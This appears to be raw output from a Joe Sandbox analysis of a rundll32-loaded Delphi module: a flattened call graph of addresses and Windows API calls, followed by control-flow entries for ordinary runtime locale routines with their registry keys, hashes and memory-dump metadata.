9194->9193 9196 42a22ed 9195->9196 9197 42a22e4 9195->9197 9266 42a299c 9196->9266 9197->9173 9200 42a232b 9202 42a2338 9200->9202 9203 42a232f 9200->9203 9201 42a299c 78 API calls 9204 42a2304 9201->9204 9291 42a229c ResetEvent 9202->9291 9287 42a22a8 WaitForSingleObject 9203->9287 9277 420a964 9204->9277 9208 42a2326 9283 41e9410 9208->9283 9210 42a2336 9292 41e8c24 9210->9292 9212 42a2351 9296 41e89ac 9212->9296 9214 42a24c6 9214->9173 9215 428e084 72 API calls 9219 42a2359 9215->9219 9218 41e8c24 5 API calls 9218->9219 9219->9173 9219->9214 9219->9215 9219->9218 9220 41e89ac 13 API calls 9219->9220 9311 428def8 9219->9311 9315 41e8b8c 9219->9315 9220->9219 9226 4313844 WindowFromPoint 9221->9226 9223 431388c 9225 43138b2 9223->9225 9231 431b330 9223->9231 9225->9164 9225->9165 9227 4313871 9226->9227 9228 4313858 9226->9228 9227->9223 9228->9227 9229 4311d04 7 API calls 9228->9229 9230 4313865 GetParent 9228->9230 9229->9228 9230->9227 9230->9228 9233 431b3af 9231->9233 9234 431b34f 9231->9234 9232 431b3e6 9232->9225 9233->9232 9238 428e084 9233->9238 9234->9233 9236 428e084 72 API calls 9234->9236 9237 431b330 72 API calls 9234->9237 9236->9234 9237->9234 9239 428e0a0 9238->9239 9240 428e091 9238->9240 9239->9233 9242 428df98 9240->9242 9243 41ef080 46 API calls 9242->9243 9244 428dfd6 9243->9244 9245 420a79c 72 API calls 9244->9245 9246 428dfe5 9245->9246 9246->9246 9248 433bd82 9247->9248 9251 42fb740 9248->9251 9250 433bd97 9250->9188 9252 42fb746 9251->9252 9255 42c8138 9252->9255 9254 42fb75b 9254->9250 9256 42c813e 9255->9256 9259 42a500c 9256->9259 9258 42c8153 9258->9254 9260 42a5012 9259->9260 9261 42a35e8 76 API calls 9260->9261 9262 42a5027 9261->9262 9262->9258 9264 428e084 72 API calls 9263->9264 9265 43c496c 9264->9265 9265->9193 9267 41f028c 4 API calls 9266->9267 9268 42a29a2 9267->9268 9269 42a29f6 9268->9269 9321 42a0a98 9268->9321 9270 41f028c 4 API calls 9269->9270 9272 42a22f2 9270->9272 9272->9200 9272->9201 9275 41f028c 4 API calls 9275->9269 9276 42a29b7 9325 42b3720 9276->9325 9278 420a972 9277->9278 9279 41ef080 46 API calls 9278->9279 9280 420a99c 9279->9280 9281 4205cc4 72 API calls 9280->9281 9282 420a9aa 9281->9282 9282->9208 9284 41e9414 9283->9284 9286 41e945c 9284->9286 9398 41e6f68 9284->9398 9288 42a22bb 9287->9288 9289 42a22c0 9287->9289 9401 42a229c ResetEvent 9288->9401 9289->9210 9291->9210 9293 41e8c2c 9292->9293 9295 41e8c42 9293->9295 9402 41e8850 9293->9402 9295->9212 9298 41e89ba 9296->9298 9299 41e89e3 GetTickCount 9298->9299 9300 41e8a8c GetTickCount 9298->9300 9301 41e89fb GetTickCount 9298->9301 9302 41e8a55 GetTickCount 9298->9302 9304 41e8a08 9298->9304 9305 41e8a2a GetCurrentThreadId 9298->9305 9412 41e8e38 GetCurrentThreadId 9298->9412 9417 41e8668 9298->9417 9299->9298 9424 41e8ba4 9300->9424 9301->9298 9301->9304 9302->9298 9302->9304 9304->9219 9305->9304 9307 41e8ab6 GetTickCount 9308 41e8a9c 9307->9308 9308->9300 9308->9307 9309 41e8b20 9308->9309 9309->9304 9310 41e8b26 GetCurrentThreadId 9309->9310 9310->9304 9312 428df03 9311->9312 9313 428df98 72 API calls 9312->9313 9314 428df17 9312->9314 9313->9314 9314->9219 9316 41e8b94 9315->9316 9317 41e8c24 5 API calls 9316->9317 9318 41e8b9b 9317->9318 9428 41e8b44 9318->9428 9322 42a0a9e 9321->9322 9339 42a2604 9322->9339 9324 42a0abd 9324->9276 9361 42b386c 9325->9361 9327 42b3747 9328 42b379a 9327->9328 9329 42b3784 9327->9329 9331 42b3798 9328->9331 9370 41ef080 9328->9370 9367 421e940 9329->9367 9379 42b3910 9331->9379 9335 42b37ca 9375 420a79c 9335->9375 9337 42b37d9 9338 41e9410 4 API calls 9337->9338 9338->9331 9340 42a2616 9339->9340 9341 42a265e 9340->9341 9342 42a26b4 GetCurrentThread GetCurrentThreadId 9340->9342 9352 41e9c54 9341->9352 9351 42a26b2 9342->9351 9344 42a2673 9345 42a267c GetLastError 9344->9345 9344->9351 9356 4209220 9345->9356 9347 42a268b 9348 420a964 72 API calls 9347->9348 9349 42a26ad 9348->9349 9350 41e9410 4 API calls 9349->9350 9350->9351 9351->9324 9353 41e9c71 9352->9353 9354 41e9c90 CreateThread 9353->9354 9355 41e9cb9 9354->9355 9355->9344 9357 4209231 9356->9357 9358 4209237 FormatMessageW 9356->9358 9357->9358 9359 4209259 9358->9359 9360 420927f LocalFree 9359->9360 9360->9347 9362 42b387b 9361->9362 9363 41e8c24 5 API calls 9362->9363 9364 42b3883 9363->9364 9365 41e89ac 13 API calls 9364->9365 9366 42b388b 9365->9366 9366->9327 9382 421fbd4 9367->9382 9369 421e957 9369->9331 9372 41ef088 9370->9372 9371 41ef0d5 9371->9335 9372->9371 9390 41ec4e0 9372->9390 9374 41ef0c4 LoadStringW 9374->9371 9376 420a7a8 9375->9376 9395 4205cc4 9376->9395 9378 420a7d5 9378->9337 9380 41e8b8c 7 API calls 9379->9380 9381 42a29f1 9380->9381 9381->9275 9383 421fbe4 9382->9383 9384 421fbf7 9383->9384 9385 421fbed 9383->9385 9387 421fc00 9384->9387 9389 420a754 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 9384->9389 9386 421fb94 26 API calls 9385->9386 9388 421fbf5 9386->9388 9387->9369 9388->9369 9389->9387 9391 41ec4ee 9390->9391 9392 41ec50d 9390->9392 9391->9392 9393 41ec498 45 API calls 9391->9393 9392->9374 9394 41ec504 9393->9394 9394->9374 9396 4205cec 72 API calls 9395->9396 9397 4205ce4 9396->9397 9397->9378 9399 41f028c 4 API calls 9398->9399 9400 41e6f6d 9399->9400 9400->9286 9401->9289 9403 41e8859 9402->9403 9405 41e885e 9402->9405 9406 41e8724 GetModuleHandleW GetProcAddress 9403->9406 9405->9295 9407 41e874c GetLogicalProcessorInformation 9406->9407 9411 41e8794 9406->9411 9408 41e875b GetLastError 9407->9408 9407->9411 9409 41e8765 9408->9409 9408->9411 9410 41e876d GetLogicalProcessorInformation 9409->9410 9410->9411 9411->9405 9413 41e8e4c 9412->9413 9414 41e8e45 9412->9414 9415 41e8e73 9413->9415 9416 41e8e60 GetCurrentThreadId 9413->9416 9414->9298 9415->9298 9416->9415 9418 41e8673 9417->9418 9419 41e8699 Sleep 9418->9419 9420 41e86a2 9418->9420 9421 41e86c1 9418->9421 9419->9421 9422 41e86ba SwitchToThread 9420->9422 9423 41e86b1 Sleep 9420->9423 9421->9298 9422->9421 9423->9421 9425 41e8bfd 9424->9425 9426 41e8bb6 9424->9426 9425->9308 9426->9425 9427 41e8be4 Sleep 9426->9427 9427->9426 9433 41e8838 GetCurrentThreadId 9428->9433 9430 41e8b7b 9430->9219 9431 41e8b4f 9431->9430 9432 41e8ba4 Sleep 9431->9432 9432->9430 9434 41e8845 9433->9434 9434->9431 9436 4311d04 7 API calls 9435->9436 9437 4311d6a 9436->9437 9437->9072 9438 4407778 9441 41f07f8 9438->9441 9440 4407788 9442 41f0803 9441->9442 9445 41e9778 9442->9445 9446 41e978c GetCurrentThreadId 9445->9446 9447 41e9787 9445->9447 9448 41e97c2 9446->9448 9447->9446 9449 41e9ac4 9448->9449 9450 41e9835 9448->9450 9452 41e9ae0 9449->9452 9453 41e9af1 9449->9453 9464 41e970c 9450->9464 9468 41e9a2c 9452->9468 9454 41e9afa GetCurrentThreadId 9453->9454 9458 41e9b07 9453->9458 9454->9458 9457 41e9aea 9457->9453 9459 41e6f34 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 9458->9459 9460 41e9b97 FreeLibrary 9458->9460 9461 41e9bbf 9458->9461 9459->9458 9460->9458 9462 41e9bce ExitProcess 9461->9462 9463 41e9bc8 9461->9463 9463->9462 9465 41e9754 9464->9465 9466 41e971c 9464->9466 9465->9440 9466->9465 9474 41ef134 GetSystemInfo 9466->9474 9469 41e9a36 GetStdHandle WriteFile 9468->9469 9470 41e9a93 9468->9470 9475 41ea5a8 9469->9475 9470->9457 9473 41e9a83 GetStdHandle WriteFile 9473->9457 9474->9466 9476 41ea5ae 9475->9476 9476->9473 9477 41f0c34 9478 41f0cdb 9477->9478 9479 41f0c5a 9477->9479 9479->9478 9481 41f0844 9479->9481 9482 41f086f 9481->9482 9483 41f08e0 RaiseException 9482->9483 9484 41f0908 9482->9484 9500 41f0975 9483->9500 9485 41f099d LoadLibraryA 9484->9485 9486 41f09a8 9484->9486 9489 41f0a3e 9484->9489 9484->9500 9485->9486 9491 41f09ac GetLastError 9486->9491 9492 41f09f7 9486->9492 9487 41f0aa7 9490 41f0aab GetLastError 9487->9490 9487->9500 9488 41f0a9b GetProcAddress 9488->9487 9489->9487 9489->9488 9489->9500 9493 41f0abc 9490->9493 9494 41f09bd 9491->9494 9497 41f0a38 FreeLibrary 9492->9497 9498 41f0a05 9492->9498 9496 41f0ace RaiseException 9493->9496 9493->9500 9494->9492 9495 41f09cf RaiseException 9494->9495 9495->9500 9496->9500 9497->9489 9498->9489 9499 41f0a0b LocalAlloc 9498->9499 9499->9489 9501 41f0a1b 9499->9501 9500->9479 9501->9489 9502 43fe170 9503 43fe186 9502->9503 9511 43c7f48 9503->9511 9505 43fe19f 9506 43c7f48 10 API calls 9505->9506 9507 43fe1b2 9506->9507 9517 43c80a4 9507->9517 9509 43fe1b9 9530 43c7e18 9509->9530 9513 43c7f62 9511->9513 9512 43c8063 9512->9505 9513->9512 9514 43c801d GetWindowLongW SetWindowLongW 9513->9514 9515 43c8045 9513->9515 9514->9515 9534 43bacf4 GetWindowLongW 9515->9534 9519 43c80d0 9517->9519 9518 43c819d 9518->9509 9519->9518 9521 43c80eb 9519->9521 9545 43bf758 9519->9545 9522 43c8153 9521->9522 9523 43c8134 9521->9523 9525 43c8155 9521->9525 9522->9518 9524 43c7e30 129 API calls 9522->9524 9549 43c7494 9523->9549 9524->9522 9574 43bdc28 9525->9574 9531 43c7e1e 9530->9531 9532 43c7d04 129 API calls 9531->9532 9533 43c7e2b 9531->9533 9532->9531 9533->9509 9535 43bad0d 9534->9535 9536 43bad2f IsIconic IsWindowVisible 9535->9536 9537 43badb0 9535->9537 9538 43bad5a ShowWindow 9536->9538 9539 43bad62 9536->9539 9537->9512 9538->9539 9540 43bad77 SetWindowLongW 9539->9540 9541 43bad66 SetWindowLongW 9539->9541 9542 43bad86 9540->9542 9541->9542 9542->9537 9543 43bada8 ShowWindow 9542->9543 9544 43bad9e ShowWindow 9542->9544 9543->9537 9544->9537 9546 43bf793 9545->9546 9547 43bf766 9545->9547 9546->9521 9547->9546 9548 43bf78d ShowWindow 9547->9548 9548->9546 9578 43bac70 9549->9578 9551 43c74a3 9552 43c74fe 9551->9552 9581 43c66f8 9551->9581 9552->9522 9571 43c2f5c 9552->9571 9554 43c74b2 9555 43c74bb SetActiveWindow 9554->9555 9556 43c74c7 9554->9556 9555->9556 9584 43c6954 9556->9584 9558 43c74d4 9559 43c750f 9558->9559 9561 43c74dd 9558->9561 9560 43c8f78 2 API calls 9559->9560 9565 43c751c 9560->9565 9561->9552 9599 43c8f78 IsWindowEnabled 9561->9599 9562 43c758f 9602 43c5b28 9562->9602 9565->9562 9567 43c7539 IsWindowEnabled 9565->9567 9567->9562 9569 43c7543 9567->9569 9568 43bf758 ShowWindow 9568->9552 9570 43c7568 SetWindowPos DefWindowProcW 9569->9570 9570->9552 9572 43bdc28 78 API calls 9571->9572 9573 43c2f68 9572->9573 9573->9522 9575 43bdc4e 9574->9575 9577 43bdc38 9574->9577 9575->9577 9637 43bf798 9575->9637 9577->9522 9579 43bac8b IsIconic 9578->9579 9580 43bac7e 9578->9580 9579->9551 9580->9551 9610 43c65f8 9581->9610 9585 43c6970 9584->9585 9590 43c6a0e 9584->9590 9586 43c6978 9585->9586 9587 43c6a19 9585->9587 9589 43c698c EnumWindows 9586->9589 9586->9590 9588 43c6a83 9587->9588 9587->9590 9596 43c6a6c ShowWindow 9587->9596 9588->9590 9593 428e084 72 API calls 9588->9593 9591 43c699d 9589->9591 9592 43c69df 9589->9592 9623 43c6848 GetWindow 9589->9623 9590->9558 9591->9592 9597 43c69c8 ShowWindow 9591->9597 9592->9590 9595 428e084 72 API calls 9592->9595 9594 43c6aa6 ShowOwnedPopups 9593->9594 9594->9588 9594->9590 9598 43c6a02 ShowOwnedPopups 9595->9598 9596->9588 9596->9596 9597->9592 9597->9597 9598->9590 9598->9592 9600 43c8f98 EnableWindow 9599->9600 9601 43c74f4 9599->9601 9600->9601 9601->9568 9633 43c5acc SystemParametersInfoW 9602->9633 9605 43c5b41 ShowWindow 9607 43c5b4c 9605->9607 9608 43c5b53 9605->9608 9636 43c5afc SystemParametersInfoW 9607->9636 9608->9552 9611 43c660d 9610->9611 9612 43c6694 9610->9612 9611->9612 9613 43c6616 EnumWindows 9611->9613 9612->9554 9613->9612 9614 43c6636 GetWindow GetWindowLongW 9613->9614 9618 43c6534 9613->9618 9615 43c6653 9614->9615 9615->9612 9616 428e084 72 API calls 9615->9616 9617 43c6688 SetWindowPos 9616->9617 9617->9612 9617->9615 9620 43c654e 9618->9620 9619 43c657e GetWindow 9621 43c658a GetWindowLongW 9619->9621 9622 43c6596 9619->9622 9620->9619 9620->9622 9621->9622 9624 43c687e 9623->9624 9625 43c6865 9623->9625 9627 43c6883 GetCurrentProcessId 9624->9627 9625->9624 9626 43c6872 GetWindowThreadProcessId 9625->9626 9626->9627 9628 43c688d 9627->9628 9629 43c691c 9628->9629 9630 43c68dc IsWindowVisible 9628->9630 9630->9629 9631 43c68e6 9630->9631 9632 41ec0c0 26 API calls 9631->9632 9632->9629 9634 43c5aeb 9633->9634 9634->9605 9635 43c5afc SystemParametersInfoW 9634->9635 9635->9605 9636->9608 9638 43bfb3a 9637->9638 9639 43bf7b0 9637->9639 9638->9577 9639->9638 9640 43bf7c9 9639->9640 9641 43bf7de 9639->9641 9659 43bef8c 9640->9659 9642 43bf80a 9641->9642 9644 43bf7f5 9641->9644 9645 43bf7d6 9642->9645 9676 43c5d24 9642->9676 9646 43bef8c 75 API calls 9644->9646 9648 43bef8c 75 API calls 9645->9648 9646->9645 9649 43bf825 9648->9649 9683 43c4928 9649->9683 9651 43c4928 GetSystemMetrics 9654 43bf836 9651->9654 9652 43c4914 72 API calls 9652->9654 9653 43c4448 GetMonitorInfoW 9653->9654 9654->9638 9654->9651 9654->9652 9654->9653 9655 43c43b4 GetMonitorInfoW 9654->9655 9656 43c4400 GetMonitorInfoW 9654->9656 9657 43c43e8 GetMonitorInfoW 9654->9657 9658 43c43cc GetMonitorInfoW 9654->9658 9655->9654 9656->9654 9657->9654 9658->9654 9686 431eb9c 9659->9686 9661 43bef9d MonitorFromWindow 9662 43c4928 GetSystemMetrics 9661->9662 9668 43befaf 9662->9668 9663 43befde 9691 43c5cb4 9663->9691 9665 43befe8 9667 43c4928 GetSystemMetrics 9665->9667 9673 43beff2 9667->9673 9668->9663 9669 43befca 9668->9669 9688 43c4914 9668->9688 9671 43c4914 72 API calls 9669->9671 9670 43befd6 9670->9645 9671->9670 9672 43c4914 72 API calls 9672->9673 9673->9670 9673->9672 9674 43bf00d 9673->9674 9675 43c4914 72 API calls 9674->9675 9675->9670 9698 43c5cd4 9676->9698 9679 43c5cb4 73 API calls 9680 43c5d3e 9679->9680 9681 43c5cd4 74 API calls 9680->9681 9682 43c5d44 9681->9682 9682->9645 9684 43c493a 9683->9684 9685 43c4932 GetSystemMetrics 9683->9685 9684->9654 9685->9654 9687 431eba6 9686->9687 9687->9661 9689 428e084 72 API calls 9688->9689 9690 43c4924 9689->9690 9690->9668 9694 43c5c7c 9691->9694 9695 43c5c8c 9694->9695 9697 43c5ca2 EnumDisplayMonitors 9694->9697 9696 428e084 72 API calls 9695->9696 9695->9697 9696->9695 9697->9665 9699 43c4928 GetSystemMetrics 9698->9699 9701 43c5ce7 9699->9701 9700 43c4914 72 API calls 9700->9701 9701->9700 9703 43c5d07 9701->9703 9705 43c5d14 9701->9705 9706 43c4474 GetMonitorInfoW 9701->9706 9704 43c4914 72 API calls 9703->9704 9704->9705 9705->9679 9705->9682 9706->9701

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,041ED5DC,?,?), ref: 041ED54E
                                                                              • GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,041ED5DC,?,?), ref: 041ED557
                                                                                • Part of subcall function 041ED3E4: FindFirstFileW.KERNEL32(00000000,?,00000000,041ED442,?,00000001), ref: 041ED417
                                                                                • Part of subcall function 041ED3E4: FindClose.KERNEL32(00000000,00000000,?,00000000,041ED442,?,00000001), ref: 041ED427
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
                                                                              • String ID:
                                                                              • API String ID: 3216391948-0
                                                                              • Opcode ID: 36926e79553f09887b65b4172c4fc56fcfdea5e18486bfe0d7c9d42b373cb9e7
                                                                              • Instruction ID: 95eae5be7b9b467f7710e2b0e4e302efc8ea6b036d397e64971843cb95e6f7f0
                                                                              • Opcode Fuzzy Hash: 36926e79553f09887b65b4172c4fc56fcfdea5e18486bfe0d7c9d42b373cb9e7
                                                                              • Instruction Fuzzy Hash: F8117278A006199FEB00EF96D9D1ABEB3B9EF48308F504475E904A3341DB70BE058A65
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • FindFirstFileW.KERNEL32(00000000,?,00000000,041ED442,?,00000001), ref: 041ED417
                                                                              • FindClose.KERNEL32(00000000,00000000,?,00000000,041ED442,?,00000001), ref: 041ED427
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Find$CloseFileFirst
                                                                              • String ID:
                                                                              • API String ID: 2295610775-0
                                                                              • Opcode ID: adda858c2bd1cf32bea120cb54dd1c0e2bd9ac76a6e7eac89925d00c91f6c3a5
                                                                              • Instruction ID: e80b841489cbe1d340aed8928412f341727710d3606bea3290e1711332020231
                                                                              • Opcode Fuzzy Hash: adda858c2bd1cf32bea120cb54dd1c0e2bd9ac76a6e7eac89925d00c91f6c3a5
                                                                              • Instruction Fuzzy Hash: 61F0E279500A45AFDB50FBB6DCD18AEB3ACEB482187A004B1B400E2650EB34BF00AA50
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000105,00000000,041ED22D,?,?), ref: 041ED041
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,041ED22D,?,?), ref: 041ED08A
                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,041ED22D,?,?), ref: 041ED0AC
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000), ref: 041ED0CA
                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002,Software\Embarcadero\Locales,00000000,000F0019,?,80000001), ref: 041ED0E8
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001,Software\CodeGear\Locales,00000000,000F0019,?,80000002), ref: 041ED106
                                                                              • RegOpenKeyExW.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,80000002,Software\CodeGear\Locales,00000000,000F0019,?,80000001), ref: 041ED124
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,00000000,041ED210,?,80000001,Software\Embarcadero\Locales,00000000,000F0019,?,00000000,041ED22D), ref: 041ED164
                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,00000000,041ED210,?,80000001), ref: 041ED18F
                                                                              • RegCloseKey.ADVAPI32(?,041ED217,00000000,00000000,?,?,?,00000000,00000000,00000000,?,00000000,041ED210,?,80000001,Software\Embarcadero\Locales), ref: 041ED20A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: Open$QueryValue$CloseFileModuleName
                                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales$Software\CodeGear\Locales$Software\Embarcadero\Locales
                                                                              • API String ID: 2701450724-3496071916
                                                                              • Opcode ID: a387a10092724e5200ff35bfdbe21dbb98206ef30b9ab3f65f7a9423b8d413d8
                                                                              • Instruction ID: 68dd928e08d2bc0321015fd349acc9ceca3a8ac7ded37f2dee33f2a62717c183
                                                                              • Opcode Fuzzy Hash: a387a10092724e5200ff35bfdbe21dbb98206ef30b9ab3f65f7a9423b8d413d8
                                                                              • Instruction Fuzzy Hash: 4751F37DB80A0ABFFB10DA96DDC2FBE73B9DB08704F5044A5B604E6181D770B9409A55
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(04413C14,00000000,041ECDD8,?,?,?,00000000,?,041ED6A0,00000000,041ED6FF,?,?,00000000,00000000,00000000), ref: 041ECCF2
                                                                              • LeaveCriticalSection.KERNEL32(04413C14,04413C14,00000000,041ECDD8,?,?,?,00000000,?,041ED6A0,00000000,041ED6FF,?,?,00000000,00000000), ref: 041ECD16
                                                                              • LeaveCriticalSection.KERNEL32(04413C14,04413C14,00000000,041ECDD8,?,?,?,00000000,?,041ED6A0,00000000,041ED6FF,?,?,00000000,00000000), ref: 041ECD25
                                                                              • IsValidLocale.KERNEL32(00000000,00000002,04413C14,04413C14,00000000,041ECDD8,?,?,?,00000000,?,041ED6A0,00000000,041ED6FF), ref: 041ECD37
                                                                              • EnterCriticalSection.KERNEL32(04413C14,00000000,00000002,04413C14,04413C14,00000000,041ECDD8,?,?,?,00000000,?,041ED6A0,00000000,041ED6FF), ref: 041ECD94
                                                                              • LeaveCriticalSection.KERNEL32(04413C14,04413C14,00000000,00000002,04413C14,04413C14,00000000,041ECDD8,?,?,?,00000000,?,041ED6A0,00000000,041ED6FF), ref: 041ECDBD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000007.00000002.3505886596.00000000041E1000.00000020.00000001.01000000.00000010.sdmp, Offset: 041E0000, based on PE: true
                                                                              • Associated: 00000007.00000002.3505853727.00000000041E0000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506204045.0000000004408000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506244336.000000000440E000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506283340.000000000440F000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506326451.0000000004416000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506368412.000000000441A000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506414948.000000000441C000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441D000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              • Associated: 00000007.00000002.3506446509.000000000441F000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_7_2_41e0000_rundll32.jbxd
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$Enter$LocaleValid
                                                                              • String ID: en-GB,en,en-US,
                                                                              • API String ID: 975949045-3021119265
                                                                              • Opcode ID: 51c10636423ba33c3f8e6412a7916d70f73aab5c486f46676f99ff268e6935bf
                                                                              • Instruction ID: 2de91425496ba4068905d33fb17c09d3648ccace7ce0903d8db77683f5170319
                                                                              • Opcode Fuzzy Hash: 51c10636423ba33c3f8e6412a7916d70f73aab5c486f46676f99ff268e6935bf
                                                                              • Instruction Fuzzy Hash: E721D53D300F90ABFB11BFBBCCD0639B695AF4464CF504426A501A6250FB66FC90A7E2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
